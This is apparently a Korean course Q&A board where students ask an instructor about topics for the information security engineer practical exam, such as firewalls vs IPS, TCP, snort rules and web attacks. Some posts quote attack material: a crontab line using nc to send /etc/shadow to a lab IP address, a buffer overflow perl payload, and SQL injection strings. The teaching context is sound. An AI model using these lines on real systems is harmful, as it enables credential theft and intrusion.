안녕하세요 강사님, 항시 양질의 강의 제공해주셔서 감사합니다. 기출문제 601번의 (B)의 정답은 방화벽(Firewall)" 인데, 제가 자꾸만 IPS와 헷깔려서 질문드립니다. (B)의 설명은 아래와 같은데요, "네트워크 구간에 전송되는 패킷을 정해진 규칙에 따라 차단하거나 통과시켜 공격자로부터 내부 자산을 보호하는 시스템" >> 여기에서 저는 "차단한다"라고 하는 문구때문에 IPS도 되는 거 아닌가? 라고 생각을 했습니다. 저는 탐지&차단 이면 "IPS(침입방지시스템)", 탐지만 이면 "IDS(침입탐지시스템)"로 이해를 하고 있습니다. 여기에 firewall, iptables, snort 가 혼돈 되어 명확히 구분을 못하고 있는 것 같은데 답변 부탁드립니다..!ㅠ 1) IPS와 Firewall의 상관관계 & 차이점이 무엇인지 2) IPS와 iptables의 상관관계 - firewall과 iptables 모두 룰에 따라 차단하는 기능을 제공함. - 이론교재 517p "침입차단 시스템(iptables)"이라고 표현하며, "리눅스 커널에 내장된 netfilter 기능을 관리하기 위한 툴" 이라고 되어 있어서, 하드웨어적인 장비라기 보다는, 모듈로 동작하는 것이라고 이해했습니다. - 강의 중에 공유해주신 "[실기]네트워크 보안 장비 운영"에 있는 "물리적 네트워크 보안장비 구성(예시)" 구성도를 보면, 저는 여기서 언급하는 보안장비들은 대부분 '어플라이언스 장비'라고 생각을 했습니다. - 한편 이론교재 517p "침입차단 시스템(iptables)" 이라고 표현한 것이 혹시 "IPS(침입방지 시스템)"과 일부러 구분되어 표현하기 위함인지도,,정말 혹시 하는 생각을 했습니다.... - 결과적으로 iptables가 IPS의 한 종류인것인지, 그것과는 별개로 리눅스/유닉스 기반에서 제공하는 부수적인 기능인데 관리 효율성을 위해 IPS 장비를 별도로 두고 이용하는 것인지 궁금합니다.(ex. PAM, TCP Wrapper 대신 Secure OS를 사용하는 것 처럼) 3) IDS에 포함되는 snort - 한편 snort의 경우에는 "네트워크 기반 IDS" 범주 안에 들어가는 장비로 강의자료에 명시되어 있습니다. - PART04. 침해사고 분석대응 - 보안장비 운영 파트에서 연속적으로 snort와 iptables를 배우다보니, 제가 두 장비를 '뭔가 비슷한 결의 장비'라고는 이해했는데 "뭔가"가 무엇인지 뚜렷하지 않아 이 혼돈이 온 것 같습니다.. 최대한 잘 정리하려고 했는데 잘 전달될련지 모르겠습니다ㅠ 긴 글 읽어주셔서 감사합니다..!
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
기출문제 관련 질문 드립니다!
안녕하세요 강사님, 항시 양질의 강의 제공해주셔서 감사합니다. 기출문제를 풀다가 잔잔바리로 궁금한 것이 있어 질문 드립니다. 1. 482번 문제 정답은 "REJECT"로 되어있습니다. 문제에서는 차단하기 위한 설정내용만 있고, 그 결과 로그가 떨어졌는지 여부가 나와있지 않은데 "DISCARD"로는 정답 처리가 안되는지 궁금합니다. 2. 507번 문제 c)의 정답은 "운영체제 명령어 삽입(OS Command Injection)"으로 되어있는데요, 이론 교재 387 페이지의 "운영체제 명령어 실행(OS Command Execution)"으로 ① 정답 처리가 어려운지, ② 어렵다면 이 두 공격의 차이가 어떤 것인지 궁금합니다! 3. 576번 문제 (1)의 답은 "access 파일" 입니다. 그런데 문제에서는 "메일 릴레이 설정을 위한 sendmail 데이터베이스 파일명"이라고 하였으니, access 텍스트 파일을 makemap 명령어로 수행한 결과인 "access.db 파일"이 정답이 되어야 하지 않는지 혼돈이 생기는데 확인 가능하실련지요. 감사합니다~!
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
보안기사 실기강의 7강 소리가 잘안들려요
소리가 너무 작게 들려요
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
tracert , traceroute 차이
방화벽에서 icmp는 허용하고 tcp/udp 차단을 하였다면 2개의 툴 결과 값은 달라지나요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
도메인쉐도잉과 DGA 관련질의입니다
두문제 중 DGA 답인 문제의 해설에 도메인명을 임시로 부여한다고 했다면 DGA가 정답에 가까운거 같다는 답변이 있는데 다른 문제에는 임시 도메인을 DNS의 네임을 부여하는 기법을 도메인쉐도잉이라는 문제가있었습니다. 어떤게 답에 가까운지 답변 부탁드리겠습니다
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
실기 문제편 221번
G 정답 icmp echo reply 도 될 수 있나요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
방화벽과 IPS의 차이
방화벽과 IPS 의 역할이 비슷한 것 같은데 어떤 차이가 있을까요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
tcp 세션 하이재킹
세션 하이재킹이 성공한 뒤에도 ip는 계속해서 피해자의 ip로 전송을 해야하기 때문에 세션을 가로채도 피해자는 공격자가 서버에 데이터를 요청 할 때 마다 계속 응답을 받나요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
4 way handshake 관련 질문드려요
4 way handshake 를 실습하며 wireshark를 보여주실 때, FIN,ACK이전 마지막 ACK의 Seq=820147013이었습니다. 이때 FIN,ACK 패킷의 Ack.Number가 어째서 820147013인가요?? 820147014가 되어야 하는게 아닌지 궁금합니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
logrotate.conf 설정파일 설명에 대해 질문합니다
logrotate.conf 설정파일 부분에 rotate n이라고 되있는 부분에 분명히 rotate(순환) 파일 개수를 지정하는 것이라고 나왔는데 설명해주실때 그 부분에서 해당 순환파일을 4주간 보관(유지)한다라고 하셨어요 이게 정확히 무슨의미인거죠? 윗부분에 weekly가 주마다 로그파일을 순환하는 것으로 지정이 되있는데 이럴 경우에는 혼합적으로 해석을 하는 건가요? 아니면 따로 해석해도 상관 없는 부분인건가요? 설정되있는 예시를 해석하자면 주마다 순환 로그파일을 4개로 설정하여 저장한다 라고 알면 될까요? 정확히 어떻게 해석해야하는건지 제가 설명하신 부분에 대해서 이해를 못하는건지 몰라서 질문 드립니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
p241 Slow HTTP Header Dos 공격 관련 질문
그림 4.13.10을 보면 빈라인 밑에 메시지 바디부 그림이 없는데 잘못된 거 맞죠??
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
HTTP 요청/응답 메시지의 "요청헤더"관련 질문 드립니다
안녕하세요 실기 이론강의 244페이지에는 Slow HTTP POST DoS공격 설명이 있습니다. 해당 공경의 포인트는 1. 공격자가 웹서버에 HTTP 요청을 할때 요청메소드로 POST방식 이용(요청라인) 2. 요청헤더 부분에서는 Contents-Length를 비정상적으로 크게 설정 & 소량데이터 천천히 웹서버로 보냄 3. 요청 메세지에 "빈라인"존재 로 이해하였습니다. 한편, 교재 340페이지 "HTTP 응답 메시지 구조"에서 설명하는 '응답 헤더의 주요 헤더 정보'에 Contents-Length가 있었습니다. 교재338페이지 "HTTP 요청 메시지"에서 설명하는 '요청 헤더의 주요 헤더 정보'에는 Contents-Length를 포함하지 않고 있어서 약간 혼동이 왔는데요..! 왜냐하면 앞서 배운 RUDY공격에서는 HTTP '요청' 메시지에서 Contents-Length라는 헤더정보를 이용했기 때문입니다. Contents-Length 헤더정보는 HTTP '요청' 혹은 '응답'메시지에 상관 없이 사용 가능한 헤더 정보라고 보면 될까요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
시험때TCP SYN 스캔을 스텔스 스캔이라고 써야 하나요?
22년 실기 책에는 스텔스 스캔이라고 적혀있지만 22년 필기 책에선 SYN 스캔 시 공격 대상쪽 로그에 SYN 로그가 남아 공격 사실을 완전히 숨길수 없다고 나와있고 TCP SYN 스캔 의 스텔스 여부를 인터넷에 검색 했을때는 스텔스 스캔이 아니라는 글도 보여서 질문합니다
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
안녕하세요 강의를 2주정도만 연장해서 들을수있을까요?
안녕하세요 1년짜리 지안패스를 끊었는데 시험 2주전에 끝나네요 강의가... 혹시 연장해서들을수있을까요? 주단위로 연장이가능한지 궁금합니다
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
tracert, traceroute 동작 원리 관련 질문
안녕하세요, 실기 문제 풀다가 궁금한 점이 생겨 질문드립니다. 문제편 221번에 마지막 정답이 Destination Unreachable 만 있는데 tracert의 경우 ping 메시지를 통해 네트워크 상태를 관리하기 때문에 답에 ICMP Echo Reply 도 있어야 하지 않나요? 강의와 교재를 바탕으로는 tracert, traceroute 는 각각 icmp ping, udp 패킷을 이용하여 네트워크 상태를 관리하며 목적지 도달시 각각 ICMP Echo Reply, Destination Unreachable 패킷을 수신한다고 알고 있습니다. 감사합니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
rsyslog 재시작 명령어
/etc/rsyslog.conf 파일을 편집 후, rsyslog를 재시작 할때 service rsyslogd restart 가 아닌 service rsyslog restart 로 명령어를 작성해야 하나요??
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
510p ftp 전사/사전 공격 탐지 스노트 룰
매 30초동안 5번째 이벤트마다 alert 수행을 하는데, 30초간 4번실패는 탐지가 안되는건가요??
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
ARP, icmp redirect
ARP 캐시 테이블이 라우팅 경로보다 빠르게 적용되나요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
111 레이스 컨디션
공격 시연 할 때 테스트코드 race_conf.c 실행하기 전 공격자가 미리 심볼릭 링크 만들어 두어도 공격이 이루어지나요??
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
강의 재수강 하려고 하는데 재수강 할인이 가능 할까요?
강의 재 수강 하려고 하는데 재수강 할인이 가능 할까요? 정보보안기사 4회차 시험까지 들으려고 합니다. 전체를 다시 구매 해야 할까요?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
웹서버와 웹어플리케이션의 용어 차이
책의 내용을 보면 웹서버와 웹어플리케이션이라는 용어가 많이 나오던데 두 용어의 의미가 같은 것 일까요? 만약 다르다면 어떤 차이가 있을까요? 예) 웹쉘 : 악의적인 목적으로 <웹서버>에서 임의의 명령을 실행할 수 있는 서버 사이드 스크립트 <웹 어플리케이션>에서 파일을 다운로드 시 파일명을 파라미터로 받아 처리하는 경우 이를 적절히 필터링하지 않으면
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
안녕하세요, 91강 강의 이미지 질문입니다.
안녕하세요, 질문 드립니다! 공격자가 요청 파라미터를 조작하고 있는데요, 응답 헤더에서 Version 과 Status Code 사이는 공백이어야 하지 않나요? 강의 이미지와 교재에서는 개행(%0D%0A) 처리가 되어 있습니다. 첨부한 이미지에 표시해놨습니다!
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
175 arp, icmp 리다이렉트
라우터와 호스트간 arp 프로토콜 과정은 거치지 않나요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
135강 사회공학기법 관련 질문드립니다.
안녕하세요 선생님, 항상 양질의 강의에 감사드립니다. 좀 사소한 질문입니다만, 사회공학기법 중 피싱(Phishing)에서 나오는 가짜사이트(Fake Site)/피싱사이트(Phising Site)와 파밍(Pharming)에서 나오는 (Fake Site)/파밍사이트(Pharming Site) 간에 차이점이 별도로 있나요? 강의 자료에 소개되어 있는 사회공학기법으로는 피싱,파밍,스미싱 이렇게 있는데요. 피싱의 한 종류가 스미싱인 반면, 파밍과 스미싱은 아예 구분되는 것으로 강의를 이해했습니다만, 결국 파밍(정상 도메인 주소를 입력해고 가짜 사이트 접속)의 연장선 상에 있는 것이 피싱(이메일, 메신저를 통해 가짜 사이트 접속)이 아닐까라는 생각도 들어 질문드리게 되었습니다. 답변 미리 감사드립니다~
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
gnu bash 취약점 실습 528p
쉘 명령어 삽입하고 파일 다운받고 리버스 쉘 하는 공격들 모두 아파치 계정권한으로 되는건가요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
11강 crontab 을 이용한 nc 명령 사용 관련 질문
안녕하세요 ^^ 질문드립니다. 공격자가 crontab 을 이용하여 /etc/shadow 파일 탈취하는 예시를 들어주셨는데요, nc 명령은 절대경로로 써주지 않아도 되나요?? 실습해주신 화면에서는 동작을 해서 여쭤봅니다. 보여주신 예) * * * * * nc 192.168.197.134 80 < /etc/shadow 감사합니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
pam_tally2 없어졌다는데 업데이트 좀 하시져...
우분투 최근 버전에는 pam_tally2 없어지고 다른걸로 대체되었다고 합니다. 계속 구글링하면서 시간만 낭비했네요 지금 2016년 이후 강의 업데이트가 없는건 너무 심한거 같은데요. 강의좀 업데이트 하시길 바랍니다. http://changelogs.ubuntu.com/changelogs/pool/main/p/pam/pam_1.4.0-11ubuntu2/changelog
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
143 p
7계층 그림도 잘 이해를 못하겠습니다. a노드에서 b노드로 데이터를 전송할 때 제가 그린 경로로 통신이 이루어지나요? 그리고 각 계층에서 인접한 노드끼리 점 선이 왜 그려져 있는지 모르겠어요
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
146p 인접한 라우터간의 통신
A(호스트) - B(라우터) - C(라우터) - D(호스트) 이런 네트워크 환경에서 A에서 D로 데이터를 보낼때 B 와 C를 경유하는데 여기서 인접한 2개의 라우터는 데이터 링크계층으로 통신하는것으로 그림이 그려져 있어서요. 2계층 통신이라면 데이터 전송 입장에서 라우터는 라우팅을 하는 호스트인건가요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
577p 4번 관리자 페이지
로그인 하기전에도 페이지 요청은 정상적으로 응답 됐으니까 관리자 페이지 접근 후 로그인 하지 않고 있어도 200 뜨고 로그인 후 에도 200 뜨나요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
iptables 쓰는이유
snort를 보고 iptables를 보면 하위호환 느낌이 나는데 쓰는이유가 있나요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
문의드립니다 ~~ ddos 공격 방법에 대하여
안녕하세요 강사님 공격 방법에 따라 dos 나 ddos 공격 대응 방법에 라우터에 rate-limit 설정이나 ingress 필터링 Unicast RPF 필터링 등도 있고 또 공격 종류에 따라서 TCP SYN FLOODING, SMURF 공격 에 대한 대응 방법인 SYN-COOKIE 설정이나 Directed broadcast 패킷 차단 등이 있는 것으로 알고 있는데 그럼 라우터에 대한 대응 설정은 대부분의 ddos 공격에 대한 대응도 같이 되는 건가요???? 예를 들어 tcp syn flooding 공격에 대한 대응으로 중간 라우터 단에서 ingress 필터링이라던지요 답변 부탁드립니다.
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
509p 전사공격 탐지
책에 쓰여 있는대로 룰 설정하면 1번만 실패해도 탐지되지 않나요? 전사공격인지 아닌지 파악이 되나요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
강의중 나오는 강의이미지는 어디서 다운 가능한가요??
강의중 나오는 강의이미지는 어디서 다운 가능한가요??
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
http 응답 분할 유용성
개행을해서 응답이 2개로 분리되어 악성코드 실행 과정 까지 이해를 했는데 공격 시도한후 응답은 공격자에게 돌아오는 것 같은데 어떻게 이게 무슨 소용이 있는 건지 모르겠어요. 웹서버에서 악성코드가 실행 되는 것 같지도 않고 어떻게 활용이 되는건가요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
검색엔진 취약점 내 robots.txt 설정시 문의사항
안녕하세요. 검색엔진 취약점을 보는중에 robots.txt설정파일을 공부했는데, 궁금해서 네이버에 robots파일을 확인하니 아래와 같이 나왔습니다. User-agent: * Disallow: / Allow: /$ 설정의 뜻이 모든검색엔진이 /(루트디렉터리)만 허용하고 그 외의 접근은 차단한다 <- 가 맞는 해석인지 궁금합니다. 감사합니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
스위치 환경에서 arp 프로토콜
스위치는 포트에 연결된 노드로 패킷을 전달하기 때문에 arp 프로토콜이 필요없지 않나요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
76강 sql injection문의드립니다
대상 db에 상관없이 공격할 수 있는 입력값으로 ‘or ‘a’=‘a 라는 설명을 주셨는데요 그럼 아이디는 참 인데 패스워드쪽 주석이 해결이 어떻게 되는건가요? 왜 만능인지 이해르르 못 했어요 알려주시면 감사드리겠습니다
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
DNS Cache Poisoning공격에 관해 질문드립니다.
교수님 안녕하세요. DNS Cache Poisoning 관해 질문드립니다. DNS Cache Poisoning 공격에서 공격자가 동일한 다수의 DNS 질의를 보내는 까닭이 무엇인가요? 제 생각에는 어차피 www.algisa.com에 대한 질의가 처음 들어간 순간부터 Recursive DNS서버가 Cache정보를 가지고 있지 않다면, 상위 계층 도메인에 질의를 진행할테고, 그렇다면 다수의 질의를 보낼 시간에 응답을 더 무차별적으로 대입해 보는게 시간적으로 이득이 되지 않을까 하는 생각이 들어 질문드립니다. 아니면 다수의 조작된 응답을 보내기 위해서는 필수적으로 다수의 질의가 필요한 것인지 궁급합니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
ip 변조
공격 기법에 아이피를 숨기기 위해 변조하는 경우가 많은데, 피해자 입장에서는 변조된 아이피로 정보를 보낼텐데 어떻게 공격자 위치로 수신되는건가요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
수료증 요청드립니다!
수료증 요청드립니다!
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
25강 버퍼오버플로우2 *** stack smashing detected ***
교수님 강의랑 강의질문 답해주신 거 잘 보고 있습니다. 직접 실습이 너무 좋은 것 같아요.
저는 Ubuntu18.04 64bit 환경에서 실습하고 있습니다.
25강 버퍼오버플로우2 강의 실습 중 ./buf_over `perl -e 'print "A"x16,"\xfa\x08"'` 명령어를 입력했더니
shell_code가 실행되지 않고 아래와 같이 버퍼오버플로우를 detected 하더군요T_T
*** stack smashing detected ***:
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
시스템버퍼오버플로우강의
강사님 안녕하세요 시스템 메모리관련 질문이 있습니다!! 24강에서 프로세스메모리구조그림은 맨밑이 low address라고나오는데요 (첨부파일)프로그램동작상식시에는 주소가 high에서 low로가서 그림 맨밑주소가 high address입니다 두개가 다른데 프로그램동작시 메모리구조가 거꾸로된그림으로 동작하는걸로 암기하면 될까요? 감사합니다!
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
p.418 질문드립니다
강사님 안녕하세요. p.418의 2)동작방식에서 공격자의 요청 파라미터를 보면 3번째 줄에 HTTP/1.1%0D%0A200 이렇게 되어있는데 HTTP버전과 응답코드 사이에는 공백이 들어가는 걸로 알고 있습니다. %0D%0A는 개행인데 혹시 %0D%0A를 %20으로 바꾸어야 되는거 아닌지 궁금합니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
P.404 와 p.406 의 유니코드 인코딩
강사님 안녕하세요. 혹시 p.404하단부를 보면 윈도우 상에서 백 슬래시의 유니코드 인코딩은 %u2216 이라 되어있는데 p.406의 (나) 의 로그중 맨 마지막줄에는 %u2215 로 표기되어있습니다. 어떤 표기가 맞는건가요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
산업기사 질문
정보보안 산업기사 실기를 현재 준비중입니다. 강의에 따로 기사/산업기사의 시험범위에 따른 강의 구분이 없는것 같아 질문 드립니다. 산업기사만 응시하는 응시자 같은 경우는 강의를 어디까지 들으면 될까요??
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
Tcp 세션 과정 중 ack.num 할당에 대한 문의
TCP 세션 연결 과정 에서, 3 way handshake 과정에서는 ack.num는 송신자의 seq.num에 +1이고, 닫힌 포트에서의 RST 과정에서의 ack.num은 송신자의 seq.num+세그먼트 데이터부의 길이가 맞나요? TCP연결 과정마다, ack.num 할당 방법이 다른지 질문드립니다. tcp 세션하이재킹과정에서는 ack.num를 seq.num+ length(세그먼트 데이터부의 길이)로 할당하던데, 뭐가 맞는지 헷갈립니다. 감사합니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
ssl 질문
혹시 ssl이랑 ssl/tls이랑 차이점이있을까요? 개인적으로 한셋트인걸로 공부했는데 하나는 답이 ssl이고 또 다른 하나는 ssl/tls이라고 해서 궁금해서 적어봅니다
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
httpd.conf 파일 대소문자 구분
웹서버 취약점 강의를 듣는데
웹서비스 메서드 취약점 제거시에는
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
http.conf 파일 대소문자 구분
웹서버 취약점 강의를 듣는데
웹서비스 메서드 취약점 제거시에는
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
보안산업기사
보안산업기사는 132강까지만들으면 되나요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
네트워크 기본학습 14 RST관련
연결 중단실습에서 out of path모드의 차단장비가 동작하는 방식을 설명해주셨습니다.. 이전 강의의 tap 장비 관련 수업에서 out of path 장비에서 연결을 끊을 때 서버쪽도 마찬가지로 RST을 마구 보내서 끊는다고 설명해주셨는데요.. 서버쪽 연결을 끊으려면 RST패킷의 SEQ 넘버를 클라이언트의 SEQ 넘버로 설정하면 되는지 궁금합니다..
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
MSS가 있으면 MTU는 필요없나요?
ip 단편화 하기전에 mss에 따라 전송 데이터 크기 맞추니 필요 없지 않나요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
find 명령어 질문 드립니다
find 명령어 질문 드립니다 find 명령어 옵션 중 "-mtime +n" 은 어떤 경우에 사용하게 되는지 궁금합니다 find 명령어 help를 보면 -daystart 옵션이 존재하는데 해당 옵션으로 기준 날짜 지정하여 + n일내 변조된 파일을 조회할 때 사용하게 되는 것인지 궁금합니다~
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
정보보안법규 관련 질문드립니다
정보보안법규 중 정보통신기반보호법, 전자서명법, 위치정보보호법에 관한 강의는 없나요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
LSA, SRM 어느것이 접근권한 관리를 하는 것인가요?
LSA : 자원에 대한 접근 검사를 수행한다. SRM : SID 를 기반으로 접근을 허용할 지 여부를 결정한다. 이렇게 나와있는데요, LSA와 SRM 둘 다 접근통제를 수행하는 것인가요 ? 아니면 둘 중 하나를 고르라는 문제가 나오면 SRM을 골라야 하는 것인가요 ? 두가지의 차이를 제대로 이해하지 못하여서 질문 드립니다. 답변주시면 감사하겠습니다.
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
웹 서버 취약점 관련 질문
강사님 안녕하세요! 웹서버 취약점 섹션 내 보안서버 구축(p.454) 쪽에 보안서버 구축의 법적 근거 내용 중 "개인정보의 기술적 관리적 보호조치 기준"과 "개인정보의 안전성 확보 조치 기준"에 모두 바이오 정보로 표기되어 있습니다. 법률 강의 때 바이오 정보는 개정되서 생체인식정보로 바뀌었다고 하셨었고, 국가법령정보센터에서 2개의 고시 모두 찾아봤는데 "생체인식정보"로 표시되어있습니다. 아무래도 내용 개정에서 누락된거 같습니다 감사합니다!!
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
실습 프로그램을 사용해서 직접해보고 싶은데, 어떤 프로그램을 이용하면 될까요?
강의 잘듣고 있습니다. 강의 내용에 매우 만족하며 잘 듣고 있는데, 중간중간 실습화면으로 보여주시는 내용으로 인해 이해가 더욱 잘되고 있습니다. 그런데, 저도 강의를 듣고난 후 공부한 이후에 프로그램을 이용하여 실습을 해보고 싶은데, 혹시 무료로 아니면 유료라도 어떤 프로그램을 설치해서 이용해볼 수 있는지 문의드려도 될까요??
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
마지막 강의 이어학습하기 질문요.
10강부터 봐야하는데 실제적으로 8강으로 틀어지고 어제도 6강까지 봤는데 2강부터 나오고 왜이런가요 도대체 ?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
갤럭시텝 dex 모드로 인강 수강 불가한지 문의드립니다.
starplayer 앱이 설치되어있음에도 불구하고 컴퓨터 웹 브라우저로 인식이 되는지 자꾸 실행파일을 다운하라고 하는데 해결방법 문의드립니다! 해결됏습니다
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
2022 실기 문제편 문의
보안기사 2022 실기 문제편에 707번 작년 기출인데 존재하지 않은 외부 ip spoofing 공격에 대응하기 위한 패킷 필터링 기술의 답이 ingress필터링인데 이거 unicast rpf 필터링은 답이 될 수 없나요?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
sql injection 질문
안녕하세요 교수님 75강 sql injection 강의에서 예문을 id = ' ' or 1=1 # id = ' ' or 1=1 -- id = ' ' or 'a' = ' 로 작성해주셨는데 위의 두가지는 뒤에 오는 문장을 주석처리로 하기 때문에 참 OR 참 인 걸 알겠는데 마지막 'a' =' 로 끝나는 건 뒤에 pass 부분을 어떻게 처리하는지 이해가 안갑니다. 항상 강의 잘 듣고 있습니다. 감사합니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
레인보우 테이블 공격
매번 다른 challenge값 으로 인증을 하니 challenge & Response 방식이면 레인보우 테이블 취약점은 해결 된 건가요??
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
정일영 강사님 문제풀이 동영상은 어디서 볼수있나요?
실기 책자 2권에 문제가 엄청 많이 있는데요 이거 설명하는 동영상은 어디서 볼수 있나요 혼자 풀기는 양도 많고 힘들어요,,,,,,,,,,,,
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
강의자료 를 어디에서 볼수 있는지?
보안기사 실기 듣고 있습니다 강의 교재에는 없는 내용을 보조자료(?), 핵심정리자료 라는 이름으로 강사님이 별도로 작성 해 놓으신것이 있는것 같은데요 교재에 없어서 상당히 답답합니다 강의 듣는사람이 어떻게 강의자료를 다운받아서 프린트해서 쓸수는 없느지요? 이런 보조자료는 왜 책에 삽입을 안했는지 답답합니다 별도로 프린트해서 공부해야 하는것이 쉽지는 안습니다 ㅠㅠㅠㅠㅠㅠ
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
개보법 안전성확보조치 기준 문의
기술적 관리적 물리적으로 개인정보의안전성 확보조치를 나누신 프린트를 보고있는데 혹시 어떤기준으로 나뉘었는지 알 수있을 까요?? 법령이라던지 자료알려주시면 감사하겠습니다.
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
개인정보 안전성확보조치 기준
프린트에 개인정보보호법 시행령 30조 개인정보안전성확보조치에 기술적, 관리적, 물리적 보호조치가 나눠저 있는데 나누는 기준을 어떻게 정하신 건 가요?? 법령이나 어디 자료에 따로 나와있나요?? 타사 관련 기출에는 보안프로그램 설치가 관리적 조치로 나와있는데 개보법을 강사님 프린트로 공ㅇ부하고 있어서 알려주시면 감사드리겠습니다 !!
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
TCP Connect scan에서 OPEN 상태 RST+ACK
안녕하세요 강의를 듣다가 확신이 안서는 부분이 있어서 질문 남깁니다. TCP connect 스캔에서 OPEN상태일때 3-way handshake가 끝나고 종료할때 RST가 아닌 RST+ACK을 보내는 이유가 연결설정이 되고 공격자가 마지막으로 ACK를 보낸 후 타겟으로부터 따로 ACK가 도착하기 전이기 때문에 이전 연결설정 SYN+ACK의 seq번호를 ACK번호로 설정해서 RST+ACK플래그 설정후 보냈다고 생각하면될까요
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
52강 51. 네트워크 기본 학습 ACK 질문
안녕하세요 교수님 강의 너무 잘 듣고 있습니다 52강 51. 네트워크 기본 학습 강의에서 19:10 쯤 내용에서 실제 존재하는 IP로 위조되었다면 RST+ACK 반환된다고 하셨는데 존재 IP ----SYN----> 타겟 <-SYN+ACK- 니까 룰에 맞춰서 RST 반환이 되어야 하는거 아닌가요? 타겟 입장에서는 연결을 유지할 필요.. 가 없으니까요..?(이유가 맞는지는 잘 모르겠습니다;;)
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
36강 31분쯤에 TCP/IP의 Transport Layer와 Internet Layer
강의에서는 TCP/IP 의 전송계층과 인터넷 계층을 Node to Node라고 했는데 End to End의 오타라고 생각하면 될까요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
기출문제 043번 (B) 답안 질문드립니다.
(B) 답으로 버퍼오버플로우 공격으로 되어 있습니다. (B)을/를 통하여 스택에서 리턴 어드레스를 수정하면 프로세스의 흐름을 조정할 수있다. 지문의 스택이 언급되어 있어 스택 버퍼 오버플로우가 더 정답에 가깝지 않나 문의드립니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
ISAC 문의
안녕하세요 강사님 공부하다가 계속 ISAC 과 CERT가 자꾸 겹치는데 두 기관의 역활이 똑같은 건가요?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
스타플레이어 앱 재생불가
동영상 강의누르면 캡쳐화면과같이 앱실행이 안되는데 왜그럴까요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
63강이 재생이 안됩니다.
아마도 반복회차가 다되서 그런거 같은데요 ㅠ 초기화 좀 부탁 드립니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
강의 일시정지 관련
안녕하세요 실기강의를 일시정지하고 싶은데 일시정지 할 수 있는 방법이 있을까요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
추가 학습자료
추가 학습자료를 파일로 받을 수 있나요 ?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
1강 옆에 강의자료 다운로드 받는 버튼
구름 눌렀는데 정보처리산업기사 실기 관련 자료입니다. 정보보안기사 실기 자료는 없나요
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
추가 학습 노트 자료 어디서 구할 수 있나요?
-
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
강의 일시중지는 없나요??
잠시 일시중지하고싶은데 할 수 없을까요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
원노트 자료
안녕하세요 강의를 듣고 있는데 원노트 강의자료파일을 받을 수 있을까요 ?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
